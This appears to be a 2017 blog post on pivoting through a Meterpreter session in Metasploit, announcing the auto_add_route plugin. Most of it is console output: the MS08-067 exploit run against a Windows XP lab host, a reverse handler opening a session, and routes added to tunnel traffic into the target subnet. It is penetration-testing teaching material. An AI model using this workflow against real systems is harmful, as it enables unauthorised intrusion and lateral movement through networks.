Last updated at Wed, 27 Sep 2017 20:51:45 GMT
Among the coolest features in metasploit is the ability to pivot through a meterpreter session to the network on the other side. The route command in msfconsole sets this up but requires a bit of typing to get right.
[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1238)
meterpreter > run get_local_subnets
Local subnet: 10.1.1.0/255.255.255.0
meterpreter > background
msf exploit(ms08_067_netapi) > route add 10.1.1.0 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.1.1.0 255.255.255.0 Session 1
msf exploit(ms08_067_netapi) >
After running the above commands any traffic sent to addresses in the 10.1.1.0 network will be tunnelled through the session. As part of my Blackhat DC presentation last week, I demo'd a plugin that automatically adds a route for any previously-unseen subnets when a new session opens up. Here is some example usage and output:
msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.1.1.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1239)
[*] AutoAddRoute: Routing new subnet 10.1.1.0/255.255.255.0 through session 1
meterpreter > background
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.1.1.0 255.255.255.0 Session 1
msf exploit(ms08_067_netapi) >
The auto_add_route plugin is now available in the metasploit trunk; 'svn up' to get it.
